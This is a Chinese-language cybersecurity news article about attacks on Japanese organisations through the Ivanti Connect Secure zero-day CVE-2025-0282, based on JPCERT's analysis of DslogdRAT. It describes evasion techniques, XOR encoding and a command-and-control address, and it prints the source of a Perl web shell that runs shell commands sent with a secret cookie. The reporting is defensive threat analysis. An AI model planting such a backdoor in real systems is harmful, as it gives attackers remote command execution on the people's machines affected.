江蘇
關(guān)鍵詞
零日漏洞
近期針對(duì)日本組織的攻擊事件表明,有技術(shù)高超的黑客利用了 Ivanti Connect Secure VPN 設(shè)備中的一個(gè)零日漏洞。
攻擊者利用 CVE-2025-0282 漏洞部署了多種惡意工具,其中包括一種名為 DslogdRAT 的定制惡意軟件以及一個(gè)精心制作的網(wǎng)頁后門。
這些工具使攻擊者能夠持續(xù)訪問被攻陷的系統(tǒng),并遠(yuǎn)程執(zhí)行任意命令。
威脅行為者通過將零日漏洞利用與定制惡意軟件部署技術(shù)相結(jié)合,展示出了高超的攻擊能力。
在攻陷 VPN 設(shè)備后,攻擊者安裝了一個(gè)基于 Perl 語言的網(wǎng)頁后門,以此作為初始立足點(diǎn),進(jìn)而能夠部署包括 DslogdRAT 在內(nèi)的更多惡意軟件組件。
這種多階段的攻擊方式顯示出攻擊者在針對(duì)安全網(wǎng)絡(luò)基礎(chǔ)設(shè)施時(shí)經(jīng)過了有條不紊的策劃,且具備較高的技術(shù)水平。
JPCERT 的分析師發(fā)現(xiàn),DslogdRAT 惡意軟件設(shè)計(jì)有特定的逃避檢測(cè)功能,特別是它僅在上午 8 點(diǎn)到晚上 8 點(diǎn)的工作時(shí)間內(nèi)運(yùn)行。
這種經(jīng)過精心算計(jì)的攻擊方式幫助攻擊者將惡意流量與合法的業(yè)務(wù)操作相融合,在保持對(duì)被攻陷環(huán)境持續(xù)訪問的同時(shí),大幅降低了被檢測(cè)到的可能性。
除了 DslogdRAT,研究人員還在同樣被攻陷的系統(tǒng)中發(fā)現(xiàn)了另一種名為 SPAWNSNARE 的惡意軟件變種,這表明這是一次經(jīng)過協(xié)同且資源充足的攻擊行動(dòng)。
Google 和 CISA 此前在 2025 年 4 月都曾報(bào)告過類似的攻擊活動(dòng),這表明針對(duì) Ivanti 產(chǎn)品的攻擊仍在持續(xù)。
安全專家警告稱,這些攻擊代表著一種持續(xù)存在的威脅,Ivanti Connect Secure 產(chǎn)品依然是高價(jià)值的攻擊目標(biāo)。
該供應(yīng)商最近已修復(fù)了另一個(gè)嚴(yán)重漏洞(CVE-2025-22457),但相關(guān)組織仍被敦促保持警惕,因?yàn)轭A(yù)計(jì)攻擊還會(huì)繼續(xù)。
DslogdRAT 的技術(shù)分析
DslogdRAT 采用了一種復(fù)雜的執(zhí)行流程,旨在逃避檢測(cè)機(jī)制。在執(zhí)行時(shí),該惡意軟件的主進(jìn)程會(huì)在立即終止自身之前創(chuàng)建一個(gè)子進(jìn)程。
隨后,第一個(gè)子進(jìn)程會(huì)對(duì)經(jīng)過異或(XOR)加密的配置數(shù)據(jù)進(jìn)行解碼(使用 0x63 作為密鑰),并生成包含核心功能的第二個(gè)子進(jìn)程。
這種進(jìn)程隔離技術(shù)有助于繞過那些監(jiān)控單進(jìn)程行為,或者在父進(jìn)程結(jié)束時(shí)就會(huì)終止檢測(cè)的安全解決方案。
攻擊者最初是通過部署在 “/home/webserver/htdocs/dana-na/cc/ccupdate.cgi” 的一個(gè)看似簡(jiǎn)單但卻有效的基于 Perl 語言的網(wǎng)頁后門獲得訪問權(quán)限的。
這個(gè) Web Shell 代碼揭示了攻擊者是如何建立初始立足點(diǎn)的:
use CGI; my $cookie_str = $ENV{HTTP_COOKIE};
if($cookie_str =~ /DSAUTOKEN=([^;]+)/) {
if($1 eq ‘a(chǎn)f95380019083db5’) {
print CGI:: header( -type => ‘text/html’ );
my $data = CGI::param(‘data’);
system($data);
exit(0);
這段代碼允許攻擊者只需發(fā)送帶有特定 cookie 值 “DSAUTOKEN=af95380019083db5” 的 HTTP 請(qǐng)求,并在 “data” 參數(shù)中包含要運(yùn)行的命令,就可以執(zhí)行任意命令。
這個(gè)后門的簡(jiǎn)單性凸顯了這樣一個(gè)事實(shí):即使是簡(jiǎn)單的代碼,在被部署到關(guān)鍵基礎(chǔ)設(shè)施中時(shí),也可能造成嚴(yán)重的安全漏洞。
DslogdRAT 與其命令控制服務(wù)器(3.112.192.119:443)之間的通信使用了一種定制的編碼機(jī)制。
所交換的數(shù)據(jù)會(huì)使用一種簡(jiǎn)單的異或操作進(jìn)行混淆處理,該操作會(huì)以 7 字節(jié)為一塊,按照輪換模式應(yīng)用從 0x01 到 0x07 的密鑰。
這種技術(shù)雖然不是非常復(fù)雜,但足以提供足夠的混淆效果,以避免基本的網(wǎng)絡(luò)流量分析,同時(shí)支持包括文件傳輸、Shell 命令執(zhí)行和代理功能在內(nèi)的多種命令功能。
安全圈
網(wǎng)羅圈內(nèi)熱點(diǎn) 專注網(wǎng)絡(luò)安全
實(shí)時(shí)資訊一手掌握!
好看你就分享 有用就點(diǎn)個(gè)贊
支持「安全圈」就點(diǎn)個(gè)三連吧!
特別聲明:以上內(nèi)容(如有圖片或視頻亦包括在內(nèi))為自媒體平臺(tái)“網(wǎng)易號(hào)”用戶上傳并發(fā)布,本平臺(tái)僅提供信息存儲(chǔ)服務(wù)。
Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.
